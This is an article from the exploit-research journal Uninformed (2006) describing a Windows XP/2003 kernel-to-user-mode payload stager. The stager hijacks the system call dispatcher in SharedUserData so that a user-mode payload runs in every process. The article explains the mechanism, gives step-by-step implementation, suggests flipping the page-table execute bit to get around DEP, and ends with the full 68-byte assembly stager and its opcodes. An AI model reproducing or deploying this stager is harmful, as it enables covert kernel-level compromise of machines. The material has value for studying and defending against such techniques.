Uninformed: Informative Information for the Uninformed

Vol 3» 2006.Jan

SharedUserData SystemCall Hook

Type: R0 to R3 Stager
Size: 68 bytes
Compat: XP, 2003
Migration: Not necessary

One particularly useful approach to staging a R3 payload from R0 is to hijack the system call dispatcher at R3. To accomplish this, one must have an understanding of the basic mechanism through which system calls are dispatched in user-mode. Prior to Windows XP, system calls were dispatched through the soft-interrupt 0x2e. As such, the method described in this subsection will not work on Windows 2000. However, starting with XP SP0, the system call interface was changed to support using processor-specific instructions for system calls, such as sysenter or syscall.

To support this, Microsoft added fields to the KUSER_SHARED_DATA structure, which is symbolically known as SharedUserData, that held instructions for issuing a system call. These instructions were placed at offset 0x300 by the kernel and took a form like the code shown below:

kd> dt _KUSER_SHARED_DATA 0x7ffe0000
   +0x300 SystemCall       : [4] 0xc819cc3`340fd48b
kd> u SharedUserData!SystemCallStub L3
7ffe0300 8bd4             mov     edx,esp
7ffe0302 0f34             sysenter
7ffe0304 c3               ret

To make use of this dynamic code block, each system call stub in ntdll.dll was implemented to make a call into the instructions found at that location.

77f7e4c3 b811000000       mov     eax,0x11
77f7e4c8 ba0003fe7f       mov     edx,0x7ffe0300
77f7e4cd ffd2             call    edx

Due to the fact that SharedUserData contained executable instructions, it was thus necessary that the SharedUserData mapping had to be marked as executable. When Microsoft began work on some of the security enhancements included with XP SP2 and 2003 SP1, such as Data Execution Prevention (DEP), they presumably realized that leaving SharedUserData executable was largely unnecessary and that doing so left open the possibility for abuse. To address this, the fields in KUSER_SHARED_DATA were changed from sets of instructions to function pointers that resided within ntdll.dll. The output below shows this change:

   +0x300 SystemCall       : 0x7c90eb8b
   +0x304 SystemCallReturn : 0x7c90eb94
   +0x308 SystemCallPad    : [3] 0

To make use of the function pointers, each system call stub was changed to issue an indirect call through the SystemCall function pointer:

7c90d4de b811000000       mov     eax,0x11
7c90d4e3 ba0003fe7f       mov     edx,0x7ffe0300
7c90d4e8 ff12             call    dword ptr [edx]

The importance behind the approaches taken to issue system calls is that it is possible to take advantage of the way in which the system call dispatching interfaces have been implemented. These interfaces can be manipulated in a manner that allows a payload to be staged from R0 to R3 with very little overhead. The basic idea behind this approach is that a R3 payload is layered in between the system call stubs and the kernel. The R3 payload then gets an opportunity to run prior to a system call being issued within the context of an arbitrary process.

This approach has quite a few advantages. First, the size of the staging payload is relatively small because it requires no symbol resolution or other means of directly scheduling the execution of code in an arbitrary or specific process. Second, the staging mechanism is inherently IRQL-safe because SharedUserData cannot be paged out. This benefit makes it such that a migration technique does not have to be employed in order to get the R0 payload to a safe IRQL.

One of the disadvantages of the payload outlined below is that it relies on SharedUserData being executable. However, it should be trivial to alter the PTE for SharedUserData to set the execute bit if necessary, thus eliminating the DEP concern.

Another thing to keep in mind about this stager is that the R3 payload must be written in a manner that allows it to be re-entrant. Since the R3 payload is layered between user-mode and kernel-mode for system call dispatching, it can be assumed that the payload will get called many times in many different process contexts. It is up to the R3 payload to figure out when it should do its magic and when it should not.

The following steps outline one way in which a stager of this type could be implemented.

  1. Obtain the address of the R3 payload

    In order to prepare to copy the R3 payload to SharedUserData (or some other globally-accessible region), the address of the R3 payload must be determined in some arbitrary manner.

  2. Copy the R3 payload to the global region

    After obtaining the address of the R3 payload, the next step would be to copy it to a globally accessible region. One such region would be in SharedUserData. This requires that SharedUserData be executable.

  3. Determine OS version

    The method used to layer between system call stubs and the kernel differs between XP SP0/SP1 and XP SP2/2003 SP1. To determine whether or not the machine is XP SP0/SP1, a comparison can be made to see if the first two bytes found at 0xffdf0300 are equal to 0xd48b (which is equivalent to a mov edx, esp instruction). If they are equal, then the operating system is assumed to be XP SP0/SP1. Otherwise, it is assumed to be XP SP2+.

  4. Hooking on XP SP0/SP1

    If the operating system version is XP SP0/SP1, hooking is accomplished by overwriting the first two bytes at 0xffdf0300 with a short jump instruction to some offset within SharedUserData that is not used, such as 0xffdf037c. Prior to doing this overwrite, a few instructions must be appended to the copied R3 payload that act as a method of restoring execution so that the original system call actually executes. This is accomplished by appending a mov edx, esp / mov ecx, 0x7ffe0302 / jmp ecx instruction set.

  5. Hooking on XP SP2+

    If the operating system version is XP SP2, hooking is accomplished by overwriting the function pointer found at offset 0x300 within SharedUserData. Prior to overwriting the function pointer, the original function pointer must be saved and an indirect jmp instruction must be appended to the copied R3 payload so that system calls can still be processed. The original function pointer can be saved to 0xffdf0308 which is currently defined as being used for padding. The jmp instruction can therefore indirectly acquire the original system call dispatcher address from 0x7ffe0308.

The following code illustrates an implementation of this type of staging payload. It's roughly 68 bytes in size, excluding the R3 payload and the recovery method.

00000000  EB3F              jmp short 0x41
00000002  BB0103DFFF        mov ebx,0xffdf0301
00000007  4B                dec ebx
00000008  FC                cld
00000009  8D7B7C            lea edi,[ebx+0x7c]
0000000C  5E                pop esi
0000000D  57                push edi
0000000E  6A01              push byte +0x1 ; number of dwords to copy
00000010  59                pop ecx
00000011  F3A5              rep movsd
00000013  B88BD4B902        mov eax,0x2b9d48b
00000018  663903            cmp [ebx],ax
0000001B  7511              jnz 0x2e
0000001D  AB                stosd
0000001E  B803FE7FFF        mov eax,0xff7ffe03
00000023  AB                stosd
00000024  B0E1              mov al,0xe1
00000026  AA                stosb
00000027  66C703EB7A        mov word [ebx],0x7aeb
0000002C  5F                pop edi
0000002D  C3                ret ; substitute with recovery method
0000002E  8B03              mov eax,[ebx]
00000030  8D4B08            lea ecx,[ebx+0x8]
00000033  8901              mov [ecx],eax
00000035  66C707FF25        mov word [edi],0x25ff
0000003A  894F02            mov [edi+0x2],ecx
0000003D  5F                pop edi
0000003E  893B              mov [ebx],edi
00000040  C3                ret ; substitute with recovery method
00000041  E8BCFFFFFF        call 0x2

... R3 payload here ...